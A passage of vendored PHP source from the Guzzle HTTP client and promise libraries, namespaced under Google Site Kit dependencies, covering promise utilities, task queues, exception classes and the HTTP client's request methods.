($this->state === self::PENDING) { $this->reject('Invoking the wait callback did not resolve the promise'); } } private function invokeWaitFn() : void { try { $wfn = $this->waitFn; $this->waitFn = null; $wfn(\true); } catch (\Throwable $reason) { if ($this->state === self::PENDING) { // The promise has not been resolved yet, so reject the promise // with the exception. $this->reject($reason); } else { // The promise was already resolved, so there's a problem in // the application. throw $reason; } } } private function invokeWaitList() : void { $waitList = $this->waitList; $this->waitList = null; foreach ($waitList as $result) { do { $result->waitIfPending(); $result = $result->result; } while ($result instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise); if ($result instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface) { $result->wait(\false); } } } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; final class Utils { /** * Get the global task queue used for promise resolution. * * This task queue MUST be run in an event loop in order for promises to be * settled asynchronously. It will be automatically run when synchronously * waiting on a promise. * * <code> * while ($eventLoop->isRunning()) { * GuzzleHttp\Promise\Utils::queue()->run(); * } * </code> * * @param TaskQueueInterface|null $assign Optionally specify a new queue instance. */ public static function queue(?\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\TaskQueueInterface $assign = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\TaskQueueInterface { static $queue; if ($assign) { $queue = $assign; } elseif (!$queue) { $queue = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\TaskQueue(); } return $queue; } /** * Adds a function to run in the task queue when it is next `run()` and * returns a promise that is fulfilled or rejected with the result. * * @param callable $task Task function to run. */ public static function task(callable $task) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $queue = self::queue(); $promise = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise([$queue, 'run']); $queue->add(function () use($task, $promise) : void { try { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($promise)) { $promise->resolve($task()); } } catch (\Throwable $e) { $promise->reject($e); } }); return $promise; } /** * Synchronously waits on a promise to resolve and returns an inspection * state array. * * Returns a state associative array containing a "state" key mapping to a * valid promise state. If the state of the promise is "fulfilled", the * array will contain a "value" key mapping to the fulfilled value of the * promise. If the promise is rejected, the array will contain a "reason" * key mapping to the rejection reason of the promise. * * @param PromiseInterface $promise Promise or value. */ public static function inspect(\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $promise) : array { try { return ['state' => \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::FULFILLED, 'value' => $promise->wait()]; } catch (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\RejectionException $e) { return ['state' => \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::REJECTED, 'reason' => $e->getReason()]; } catch (\Throwable $e) { return ['state' => \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::REJECTED, 'reason' => $e]; } } /** * Waits on all of the provided promises, but does not unwrap rejected * promises as thrown exception. * * Returns an array of inspection state arrays. * * @see inspect for the inspection state array format. * * @param PromiseInterface[] $promises Traversable of promises to wait upon. */ public static function inspectAll($promises) : array { $results = []; foreach ($promises as $key => $promise) { $results[$key] = self::inspect($promise); } return $results; } /** * Waits on all of the provided promises and returns the fulfilled values. * * Returns an array that contains the value of each promise (in the same * order the promises were provided). An exception is thrown if any of the * promises are rejected. * * @param iterable<PromiseInterface> $promises Iterable of PromiseInterface objects to wait on. * * @throws \Throwable on error */ public static function unwrap($promises) : array { $results = []; foreach ($promises as $key => $promise) { $results[$key] = $promise->wait(); } return $results; } /** * Given an array of promises, return a promise that is fulfilled when all * the items in the array are fulfilled. * * The promise's fulfillment value is an array with fulfillment values at * respective positions to the original array. If any promise in the array * rejects, the returned promise is rejected with the rejection reason. * * @param mixed $promises Promises or values. * @param bool $recursive If true, resolves new promises that might have been added to the stack during its own resolution. */ public static function all($promises, bool $recursive = \false) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $results = []; $promise = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Each::of($promises, function ($value, $idx) use(&$results) : void { $results[$idx] = $value; }, function ($reason, $idx, \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise $aggregate) : void { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($aggregate)) { $aggregate->reject($reason); } })->then(function () use(&$results) { \ksort($results); return $results; }); if (\true === $recursive) { $promise = $promise->then(function ($results) use($recursive, &$promises) { foreach ($promises as $promise) { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($promise)) { return self::all($promises, $recursive); } } return $results; }); } return $promise; } /** * Initiate a competitive race between multiple promises or values (values * will become immediately fulfilled promises). * * When count amount of promises have been fulfilled, the returned promise * is fulfilled with an array that contains the fulfillment values of the * winners in order of resolution. * * This promise is rejected with a {@see AggregateException} if the number * of fulfilled promises is less than the desired $count. * * @param int $count Total number of promises. * @param mixed $promises Promises or values. */ public static function some(int $count, $promises) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $results = []; $rejections = []; return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Each::of($promises, function ($value, $idx, \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $p) use(&$results, $count) : void { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::settled($p)) { return; } $results[$idx] = $value; if (\count($results) >= $count) { $p->resolve(null); } }, function ($reason) use(&$rejections) : void { $rejections[] = $reason; })->then(function () use(&$results, &$rejections, $count) { if (\count($results) !== $count) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\AggregateException('Not enough promises to fulfill count', $rejections); } \ksort($results); return \array_values($results); }); } /** * Like some(), with 1 as count. However, if the promise fulfills, the * fulfillment value is not an array of 1 but the value directly. * * @param mixed $promises Promises or values. */ public static function any($promises) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return self::some(1, $promises)->then(function ($values) { return $values[0]; }); } /** * Returns a promise that is fulfilled when all of the provided promises have * been fulfilled or rejected. * * The returned promise is fulfilled with an array of inspection state arrays. * * @see inspect for the inspection state array format. * * @param mixed $promises Promises or values. */ public static function settle($promises) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { $results = []; return \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Each::of($promises, function ($value, $idx) use(&$results) : void { $results[$idx] = ['state' => \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::FULFILLED, 'value' => $value]; }, function ($reason, $idx) use(&$results) : void { $results[$idx] = ['state' => \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface::REJECTED, 'reason' => $reason]; })->then(function () use(&$results) { \ksort($results); return $results; }); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * A promise that has been rejected. * * Thenning off of this promise will invoke the onRejected callback * immediately and ignore other callbacks. * * @final */ class RejectedPromise implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { private $reason; /** * @param mixed $reason */ public function __construct($reason) { if (\is_object($reason) && \method_exists($reason, 'then')) { throw new \InvalidArgumentException('You cannot create a RejectedPromise with a promise.'); } $this->reason = $reason; } public function then(?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { // If there's no onRejected callback then just return self. if (!$onRejected) { return $this; } $queue = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Utils::queue(); $reason = $this->reason; $p = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise([$queue, 'run']); $queue->add(static function () use($p, $reason, $onRejected) : void { if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::pending($p)) { try { // Return a resolved promise if onRejected does not throw. $p->resolve($onRejected($reason)); } catch (\Throwable $e) { // onRejected threw, so return a rejected promise. $p->reject($e); } } }); return $p; } public function otherwise(callable $onRejected) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->then(null, $onRejected); } public function wait(bool $unwrap = \true) { if ($unwrap) { throw \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::exceptionFor($this->reason); } return null; } public function getState() : string { return self::REJECTED; } public function resolve($value) : void { throw new \LogicException('Cannot resolve a rejected promise'); } public function reject($reason) : void { if ($reason !== $this->reason) { throw new \LogicException('Cannot reject a rejected promise'); } } public function cancel() : void { // pass } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; final class Each { /** * Given an iterator that yields promises or values, returns a promise that * is fulfilled with a null value when the iterator has been consumed or * the aggregate promise has been fulfilled or rejected. * * $onFulfilled is a function that accepts the fulfilled value, iterator * index, and the aggregate promise. The callback can invoke any necessary * side effects and choose to resolve or reject the aggregate if needed. * * $onRejected is a function that accepts the rejection reason, iterator * index, and the aggregate promise. The callback can invoke any necessary * side effects and choose to resolve or reject the aggregate if needed. * * @param mixed $iterable Iterator or array to iterate over. */ public static function of($iterable, ?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return (new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\EachPromise($iterable, ['fulfilled' => $onFulfilled, 'rejected' => $onRejected]))->promise(); } /** * Like of, but only allows a certain number of outstanding promises at any * given time. * * $concurrency may be an integer or a function that accepts the number of * pending promises and returns a numeric concurrency limit value to allow * for dynamic a concurrency size. * * @param mixed $iterable * @param int|callable $concurrency */ public static function ofLimit($iterable, $concurrency, ?callable $onFulfilled = null, ?callable $onRejected = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return (new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\EachPromise($iterable, ['fulfilled' => $onFulfilled, 'rejected' => $onRejected, 'concurrency' => $concurrency]))->promise(); } /** * Like limit, but ensures that no promise in the given $iterable argument * is rejected. If any promise is rejected, then the aggregate promise is * rejected with the encountered rejection. * * @param mixed $iterable * @param int|callable $concurrency */ public static function ofLimitAll($iterable, $concurrency, ?callable $onFulfilled = null) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return self::ofLimit($iterable, $concurrency, $onFulfilled, function ($reason, $idx, \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface $aggregate) : void { $aggregate->reject($reason); }); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * Exception thrown when too many errors occur in the some() or any() methods. */ class AggregateException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\RejectionException { public function __construct(string $msg, array $reasons) { parent::__construct($reasons, \sprintf('%s; %d rejected promises', $msg, \count($reasons))); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * Exception that is set as the reason for a promise that has been cancelled. */ class CancellationException extends \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\RejectionException { } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; final class Create { /** * Creates a promise for a value if the value is not a promise. * * @param mixed $value Promise or value. */ public static function promiseFor($value) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if ($value instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface) { return $value; } // Return a Guzzle promise that shadows the given promise. if (\is_object($value) && \method_exists($value, 'then')) { $wfn = \method_exists($value, 'wait') ? [$value, 'wait'] : null; $cfn = \method_exists($value, 'cancel') ? [$value, 'cancel'] : null; $promise = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise($wfn, $cfn); $value->then([$promise, 'resolve'], [$promise, 'reject']); return $promise; } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\FulfilledPromise($value); } /** * Creates a rejected promise for a reason if the reason is not a promise. * If the provided reason is a promise, then it is returned as-is. * * @param mixed $reason Promise or reason. */ public static function rejectionFor($reason) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if ($reason instanceof \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface) { return $reason; } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\RejectedPromise($reason); } /** * Create an exception for a rejected promise value. * * @param mixed $reason */ public static function exceptionFor($reason) : \Throwable { if ($reason instanceof \Throwable) { return $reason; } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\RejectionException($reason); } /** * Returns an iterator for the given value. * * @param mixed $value */ public static function iterFor($value) : \Iterator { if ($value instanceof \Iterator) { return $value; } if (\is_array($value)) { return new \ArrayIterator($value); } return new \ArrayIterator([$value]); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * Represents a promise that iterates over many promises and invokes * side-effect functions in the process. * * @final */ class EachPromise implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromisorInterface { private $pending = []; private $nextPendingIndex = 0; /** @var \Iterator|null */ private $iterable; /** @var callable|int|null */ private $concurrency; /** @var callable|null */ private $onFulfilled; /** @var callable|null */ private $onRejected; /** @var Promise|null */ private $aggregate; /** @var bool|null */ private $mutex; /** * Configuration hash can include the following key value pairs: * * - fulfilled: (callable) Invoked when a promise fulfills. The function * is invoked with three arguments: the fulfillment value, the index * position from the iterable list of the promise, and the aggregate * promise that manages all of the promises. The aggregate promise may * be resolved from within the callback to short-circuit the promise. * - rejected: (callable) Invoked when a promise is rejected. The * function is invoked with three arguments: the rejection reason, the * index position from the iterable list of the promise, and the * aggregate promise that manages all of the promises. The aggregate * promise may be resolved from within the callback to short-circuit * the promise. * - concurrency: (integer) Pass this configuration option to limit the * allowed number of outstanding concurrently executing promises, * creating a capped pool of promises. There is no limit by default. * * @param mixed $iterable Promises or values to iterate. * @param array $config Configuration options */ public function __construct($iterable, array $config = []) { $this->iterable = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::iterFor($iterable); if (isset($config['concurrency'])) { $this->concurrency = $config['concurrency']; } if (isset($config['fulfilled'])) { $this->onFulfilled = $config['fulfilled']; } if (isset($config['rejected'])) { $this->onRejected = $config['rejected']; } } /** @psalm-suppress InvalidNullableReturnType */ public function promise() : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { if ($this->aggregate) { return $this->aggregate; } try { $this->createPromise(); /** @psalm-assert Promise $this->aggregate */ $this->iterable->rewind(); $this->refillPending(); } catch (\Throwable $e) { $this->aggregate->reject($e); } /** * @psalm-suppress NullableReturnStatement */ return $this->aggregate; } private function createPromise() : void { $this->mutex = \false; $this->aggregate = new \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Promise(function () : void { if ($this->checkIfFinished()) { return; } \reset($this->pending); // Consume a potentially fluctuating list of promises while // ensuring that indexes are maintained (precluding array_shift). while ($promise = \current($this->pending)) { \next($this->pending); $promise->wait(); if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::settled($this->aggregate)) { return; } } }); // Clear the references when the promise is resolved. $clearFn = function () : void { $this->iterable = $this->concurrency = $this->pending = null; $this->onFulfilled = $this->onRejected = null; $this->nextPendingIndex = 0; }; $this->aggregate->then($clearFn, $clearFn); } private function refillPending() : void { if (!$this->concurrency) { // Add all pending promises. while ($this->addPending() && $this->advanceIterator()) { } return; } // Add only up to N pending promises. $concurrency = \is_callable($this->concurrency) ? ($this->concurrency)(\count($this->pending)) : $this->concurrency; $concurrency = \max($concurrency - \count($this->pending), 0); // Concurrency may be set to 0 to disallow new promises. if (!$concurrency) { return; } // Add the first pending promise. $this->addPending(); // Note this is special handling for concurrency=1 so that we do // not advance the iterator after adding the first promise. This // helps work around issues with generators that might not have the // next value to yield until promise callbacks are called. while (--$concurrency && $this->advanceIterator() && $this->addPending()) { } } private function addPending() : bool { if (!$this->iterable || !$this->iterable->valid()) { return \false; } $promise = \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Create::promiseFor($this->iterable->current()); $key = $this->iterable->key(); // Iterable keys may not be unique, so we use a counter to // guarantee uniqueness $idx = $this->nextPendingIndex++; $this->pending[$idx] = $promise->then(function ($value) use($idx, $key) : void { if ($this->onFulfilled) { ($this->onFulfilled)($value, $key, $this->aggregate); } $this->step($idx); }, function ($reason) use($idx, $key) : void { if ($this->onRejected) { ($this->onRejected)($reason, $key, $this->aggregate); } $this->step($idx); }); return \true; } private function advanceIterator() : bool { // Place a lock on the iterator so that we ensure to not recurse, // preventing fatal generator errors. if ($this->mutex) { return \false; } $this->mutex = \true; try { $this->iterable->next(); $this->mutex = \false; return \true; } catch (\Throwable $e) { $this->aggregate->reject($e); $this->mutex = \false; return \false; } } private function step(int $idx) : void { // If the promise was already resolved, then ignore this step. if (\Google\Site_Kit_Dependencies\GuzzleHttp\Promise\Is::settled($this->aggregate)) { return; } unset($this->pending[$idx]); // Only refill pending promises if we are not locked, preventing the // EachPromise to recursively invoke the provided iterator, which // cause a fatal error: "Cannot resume an already running generator" if ($this->advanceIterator() && !$this->checkIfFinished()) { // Add more pending promises if possible. $this->refillPending(); } } private function checkIfFinished() : bool { if (!$this->pending && !$this->iterable->valid()) { // Resolve the promise if there's nothing left to do. $this->aggregate->resolve(null); return \true; } return \false; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * A task queue that executes tasks in a FIFO order. * * This task queue class is used to settle promises asynchronously and * maintains a constant stack size. You can use the task queue asynchronously * by calling the `run()` function of the global task queue in an event loop. * * GuzzleHttp\Promise\Utils::queue()->run(); * * @final */ class TaskQueue implements \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\TaskQueueInterface { private $enableShutdown = \true; private $queue = []; public function __construct(bool $withShutdown = \true) { if ($withShutdown) { \register_shutdown_function(function () : void { if ($this->enableShutdown) { // Only run the tasks if an E_ERROR didn't occur. $err = \error_get_last(); if (!$err || $err['type'] ^ \E_ERROR) { $this->run(); } } }); } } public function isEmpty() : bool { return !$this->queue; } public function add(callable $task) : void { $this->queue[] = $task; } public function run() : void { while ($task = \array_shift($this->queue)) { /** @var callable $task */ $task(); } } /** * The task queue will be run and exhausted by default when the process * exits IFF the exit is not the result of a PHP E_ERROR error. * * You can disable running the automatic shutdown of the queue by calling * this function. If you disable the task queue shutdown process, then you * MUST either run the task queue (as a result of running your event loop * or manually using the run() method) or wait on each outstanding promise. * * Note: This shutdown will occur before any destructors are triggered. */ public function disableShutdown() : void { $this->enableShutdown = \false; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Promise; /** * A special exception that is thrown when waiting on a rejected promise. * * The reason value is available via the getReason() method. */ class RejectionException extends \RuntimeException { /** @var mixed Rejection reason. */ private $reason; /** * @param mixed $reason Rejection reason. * @param string|null $description Optional description. */ public function __construct($reason, ?string $description = null) { $this->reason = $reason; $message = 'The promise was rejected'; if ($description) { $message .= ' with reason: ' . $description; } elseif (\is_string($reason) || \is_object($reason) && \method_exists($reason, '__toString')) { $message .= ' with reason: ' . $this->reason; } elseif ($reason instanceof \JsonSerializable) { $message .= ' with reason: ' . \json_encode($this->reason, \JSON_PRETTY_PRINT); } parent::__construct($message); } /** * Returns the rejection reason. * * @return mixed */ public function getReason() { return $this->reason; } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface; final class BodySummarizer implements \Google\Site_Kit_Dependencies\GuzzleHttp\BodySummarizerInterface { /** * @var int|null */ private $truncateAt; public function __construct(?int $truncateAt = null) { $this->truncateAt = $truncateAt; } /** * Returns a summarized message body. */ public function summarize(\Google\Site_Kit_Dependencies\Psr\Http\Message\MessageInterface $message) : ?string { return $this->truncateAt === null ? \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Message::bodySummary($message) : \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Message::bodySummary($message, $this->truncateAt); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\GuzzleException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Client interface for sending HTTP requests. */ trait ClientTrait { /** * Create and send an HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string $method HTTP method. * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public abstract function request(string $method, $uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; /** * Create and send an HTTP GET request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function get($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('GET', $uri, $options); } /** * Create and send an HTTP HEAD request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function head($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('HEAD', $uri, $options); } /** * Create and send an HTTP PUT request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function put($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('PUT', $uri, $options); } /** * Create and send an HTTP POST request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function post($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('POST', $uri, $options); } /** * Create and send an HTTP PATCH request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function patch($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('PATCH', $uri, $options); } /** * Create and send an HTTP DELETE request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. * * @throws GuzzleException */ public function delete($uri, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return $this->request('DELETE', $uri, $options); } /** * Create and send an asynchronous HTTP request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string $method HTTP method * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public abstract function requestAsync(string $method, $uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; /** * Create and send an asynchronous HTTP GET request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function getAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('GET', $uri, $options); } /** * Create and send an asynchronous HTTP HEAD request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function headAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('HEAD', $uri, $options); } /** * Create and send an asynchronous HTTP PUT request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function putAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('PUT', $uri, $options); } /** * Create and send an asynchronous HTTP POST request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function postAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('POST', $uri, $options); } /** * Create and send an asynchronous HTTP PATCH request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function patchAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('PATCH', $uri, $options); } /** * Create and send an asynchronous HTTP DELETE request. * * Use an absolute path to override the base path of the client, or a * relative path to append to the base path of the client. The URL can * contain the query string as well. Use an array to provide a URL * template and additional variables to use in the URL template expansion. * * @param string|UriInterface $uri URI object or string. * @param array $options Request options to apply. */ public function deleteAsync($uri, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { return $this->requestAsync('DELETE', $uri, $options); } } <?php namespace Google\Site_Kit_Dependencies\GuzzleHttp; use Google\Site_Kit_Dependencies\GuzzleHttp\Cookie\CookieJar; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\GuzzleException; use Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise as P; use Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * @final */ class Client implements \Google\Site_Kit_Dependencies\GuzzleHttp\ClientInterface, \Google\Site_Kit_Dependencies\Psr\Http\Client\ClientInterface { use ClientTrait; /** * @var array Default request options */ private $config; /** * Clients accept an array of constructor parameters. * * Here's an example of creating a client using a base_uri and an array of * default request options to apply to each request: * * $client = new Client([ * 'base_uri' => 'http://www.foo.com/1.0/', * 'timeout' => 0, * 'allow_redirects' => false, * 'proxy' => '192.168.16.1:10' * ]); * * Client configuration settings include the following options: * * - handler: (callable) Function that transfers HTTP requests over the * wire. The function is called with a Psr7\Http\Message\RequestInterface * and array of transfer options, and must return a * GuzzleHttp\Promise\PromiseInterface that is fulfilled with a * Psr7\Http\Message\ResponseInterface on success. * If no handler is provided, a default handler will be created * that enables all of the request options below by attaching all of the * default middleware to the handler. * - base_uri: (string|UriInterface) Base URI of the client that is merged * into relative URIs. Can be a string or instance of UriInterface. * - **: any request option * * @param array $config Client configuration settings. * * @see RequestOptions for a list of available request options. */ public function __construct(array $config = []) { if (!isset($config['handler'])) { $config['handler'] = \Google\Site_Kit_Dependencies\GuzzleHttp\HandlerStack::create(); } elseif (!\is_callable($config['handler'])) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('handler must be a callable'); } // Convert the base_uri to a UriInterface if (isset($config['base_uri'])) { $config['base_uri'] = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::uriFor($config['base_uri']); } $this->configureDefaults($config); } /** * @param string $method * @param array $args * * @return PromiseInterface|ResponseInterface * * @deprecated Client::__call will be removed in guzzlehttp/guzzle:8.0. */ public function __call($method, $args) { if (\count($args) < 1) { throw new \Google\Site_Kit_Dependencies\GuzzleHttp\Exception\InvalidArgumentException('Magic request methods require a URI and optional options array'); } $uri = $args[0]; $opts = $args[1] ?? []; return \substr($method, -5) === 'Async' ? $this->requestAsync(\substr($method, 0, -5), $uri, $opts) : $this->request($method, $uri, $opts); } /** * Asynchronously send an HTTP request. * * @param array $options Request options to apply to the given * request and to the transfer. See \GuzzleHttp\RequestOptions. */ public function sendAsync(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) : \Google\Site_Kit_Dependencies\GuzzleHttp\Promise\PromiseInterface { // Merge the base URI into the request URI if needed. $options = $this->prepareDefaults($options); return $this->transfer($request->withUri($this->buildUri($request->getUri(), $options), $request->hasHeader('Host')), $options); } /** * Send an HTTP request. * * @param array $options Request options to apply to the given * request and to the transfer. See \GuzzleHttp\RequestOptions. * * @throws GuzzleException */ public function send(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { $options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::SYNCHRONOUS] = \true; return $this->sendAsync($request, $options)->wait(); } /** * The HttpClient PSR (PSR-18) specify this method. * * {@inheritDoc} */ public function sendRequest(\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { $options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::SYNCHRONOUS] = \true; $options[\Google\Site_Kit_Dependencies\GuzzleHttp\RequestOptions::ALLOW_REDIRECTS] = \false; 